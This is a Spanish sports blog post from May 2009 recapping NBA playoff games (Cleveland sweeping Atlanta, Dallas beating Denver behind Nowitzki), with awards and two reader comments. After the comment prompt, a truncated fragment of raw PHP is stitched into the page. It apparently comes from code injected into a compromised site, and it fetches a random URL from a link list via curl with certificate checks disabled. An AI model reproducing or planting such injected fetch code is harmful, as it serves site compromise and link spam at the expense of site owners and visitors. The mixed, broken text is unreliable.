Playoffs (11/05/2009): Resistencia

12 de May de 2009 por txusma

Era complicado pensar que alguna de las dos series que se resolvían anoche pudiera llegar al 5º partido dado el dominio que han mostrado Cleveland y Denver contra sus respectivos rivales.

El más evidente sigue siendo el del Elegido, batiendo todos los registros con una superioridad apabullante. Tampoco es que se haya encontrado con rivales especialmente temibles ( unos Pistons medio zombis en primera ronda y unos Hawks excesivamente castigados en ésta) pero aún así no es fácil mantener este nivel de concentración y motivación 8 partidos seguidos. Lo habitual es que se hubiera dejado llevar en alguno de ellos… pero no. Ni una sola concesión a sus rivales, ni la más mínima piedad, ningún descanso a los titulares… Ahora se dejarán llevar en el sofá de sus casas durante una semana extra, como se tiene que hacer.

El de anoche, otro partido más sin demasiada historia. Con Al Horford y Marvin Williams en buenas condiciones igual los Hawks hubieran sido rival en algún partido, pero con ellos arrastrándose por la pista y con Bibby apagadísimo, no había ninguna opción. Al menos Josh Smith y Joe Johnson plantaron algo de cara, pero no nos engañemos, sin excesiva convicción.

Los Cavs fueron superiores en todo, a excepción de las muchas pérdidas producto de su juego vertiginoso al contragolpe, y unos tiros libres bastante erráticos… No se puede tener todo. Jugaron con su rival a placer, con Lebron estratosférico, unos porcentajes de tiro extraordinarios y una superioridad bajo tableros pasmosa. No va más.

Tampoco teníamos excesiva fe en Dallas con tanto problema físico y el mazazo de la canasta de Melo en el último segundo del anterior partido… Pero parece que la broma les ha sacado lo peor que llevan dentro y anoche se repartieron tortas por doquier. 7 técnicas, varias flagrantes… Vamos, un partido de playoff como Dios manda.

Sin “Birdman” con problemas estomacales, Nowitzki sacó su fusil. Menudo duelo contra el mejor Melo de su carrera. Alucinante. Además, el extraordinario banquillo de Dallas con Terry, Bass y Barea le ganó por la mano al de los Nuggets y Kidd realizó uno de sus partidos más completos en lo que va de eliminatorias. Los Mavs barrieron en rebotes y, con todo, únicamente lograron vencer de dos puntos. No es que sea un gran augurio para el próximo partido en Denver… pero al menos siguen vivos.

PREMIOS

MVP: Dirk Nowitzki ha tenido que exprimirse al máximo para remontar y finalmente ganar un partido a los Nuggets. 19 puntos en el último cuarto y 44 en total que mantienen vivos a Dallas.

Sorpresa: Demandábamos más ayuda para Dirk por parte de sus compañeros y ayer la encontró. Jason Kidd se quedó cerca del triple doble, Josh Howard se fue a los dobles figuras y Terry, Bass y Barea hicieron un buen partido desde el banco. Resultado: victoria.

Decepción: Los Hawks han sido barridos de la pista y parte de culpa la tiene la mala actuación de Mike Bibby durante la mayor parte de la eliminatoria. Como colofón, ayer tan solo fue capaz de lograr 3 puntos y 4 rebotes. Eric Dampier se merece un accésit por sus 0 puntos, 4 rebotes y 5 pérdidas.

Esfuerzo en vano: La diferencia entre ser el MVP de la noche o ganar el premio al mayor esfuerzo en vano puede ir de una sola canastas y eso es lo que les ha pasado a Dirk Nowitki y Carmelo Anthony. El de Denver se fue a los 41 puntos y 11 rebotes, merecedores, sin ninguna duda, del MVP en caso de haber ganado el partido.

RAZONES PARA TRASNOCHAR

Vuelven las 2 eliminatorias que nos mantienen en vilo ahora mismo. Una, protagonizada por unos Celtics que han pillado gustillo a esto de ofrecernos espectáculo tras espectáculo, vuelve a Boston con la incertidumbre de conocer los auténticos efectos del tiro de Glen Davis que les dio la victoria en el anterior partido frente a los Magic (2h00 hora española).

La otra regresa a la costa de Los Angeles a la espera de conocer la actitud del equipo que saltará vestido de amarillo al parquet del Staples Center. ¿Volverá a caer en los ardides de Adelman? ¿Volverá a mostrar la apatia que demostró en el anterior partido? ¿Apretará los dientes y matará la eliminatoria en 2 partidos? (4h30 h.e.)

Comenta

2 comentarios a esta entrada

  1. Jabho dice:
    #1

    juas, juas…. Pues si hubiera ganado Dallas el 3º la cosa estaría la mar de interesante (porque con la vuelta de Howard se ha igualado mucho la cosa)

    Hoy vamos con los Rockets… anda que como les de por ganar 🙂

    Go Celtics!!!!!!!

      Citar

  2. TheDeerHunter dice:
    #2

    juasss… irás tú con los Rockets
    mejor vamos con orlando que, como les de por ganar…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>